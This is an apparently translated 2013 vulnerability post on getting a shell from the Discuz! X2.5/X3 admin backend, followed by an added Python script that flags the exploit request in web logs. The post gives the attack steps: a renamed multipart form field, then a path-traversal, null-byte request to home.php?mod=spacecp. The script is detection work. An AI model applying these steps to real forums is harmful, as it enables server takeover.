dz 3.0/2.5 admin backend getshell - vulnerability warning - the black bar safety net

2013-05-25T00:00:00
ID MYHACK58:62201338938
Type myhack58
Reporter Anonymous
Modified 2013-05-25T00:00:00

Description

After getting to work I saw that the tick community had released a method for getting a shell from the Discuz X3 admin backend; t00ls members then also tested the method for getting a shell from the Discuz X2.5 admin backend.

I tested it and it didn't work: the packet I captured was not the same as the one in the given case!

After studying it I found that I had gotten a step wrong...

Original post: http://zone.wooyun.org/content/3894

User – User column – Column packet – Submit – capture the packet (this is where I went wrong: be sure to submit, or the captured data packet is not the same)

Change

```
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
```

to

```
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
```

Then access

```
/home.php?mod=spacecp&id=../../robots.txt%0057
```

Use:

The original post tested dz x3; I tested dz x2.5, ignoring the gpc.
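
A defender-side check for the request described above, as an added example that is not part of the original post: it scans web-server access logs for `home.php?mod=spacecp` requests whose `id` parameter carries a path traversal sequence or a null byte. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (common log format); addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [25/May/2013:10:00:01 +0800] "GET /home.php?mod=spacecp&ac=profile HTTP/1.1" 200 5120
203.0.113.7 - - [25/May/2013:10:01:09 +0800] "GET /home.php?mod=spacecp&id=../../robots.txt%00 HTTP/1.1" 200 312
198.51.100.4 - - [25/May/2013:10:02:11 +0800] "GET /home.php?mod=spacecp&id=..%2F..%2Frobots.txt HTTP/1.1" 200 312
192.0.2.10 - - [25/May/2013:10:03:00 +0800] "GET /home.php?mod=spacecp&id=example_plugin HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide a sequence."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_spacecp_requests(log_text):
    """Return (client, decoded id, reasons) for each flagged spacecp request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/home.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # decodes once
        if "spacecp" not in query.get("mod", []):
            continue
        for raw_id in query.get("id", []):
            value = fully_decode(raw_id)
            reasons = []
            if "../" in value or "..\\" in value:
                reasons.append("path traversal")
            if "\x00" in value:
                reasons.append("null byte")
            if reasons:
                hits.append((line.split()[0], value, reasons))
    return hits

if __name__ == "__main__":
    for client, value, reasons in suspicious_spacecp_requests(SAMPLE_LOG):
        print(client, repr(value), ", ".join(reasons))
```

Requests sent as POST with the parameter in the body will not appear in the access-log query string, so the same check belongs in a WAF or application-level filter as well.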
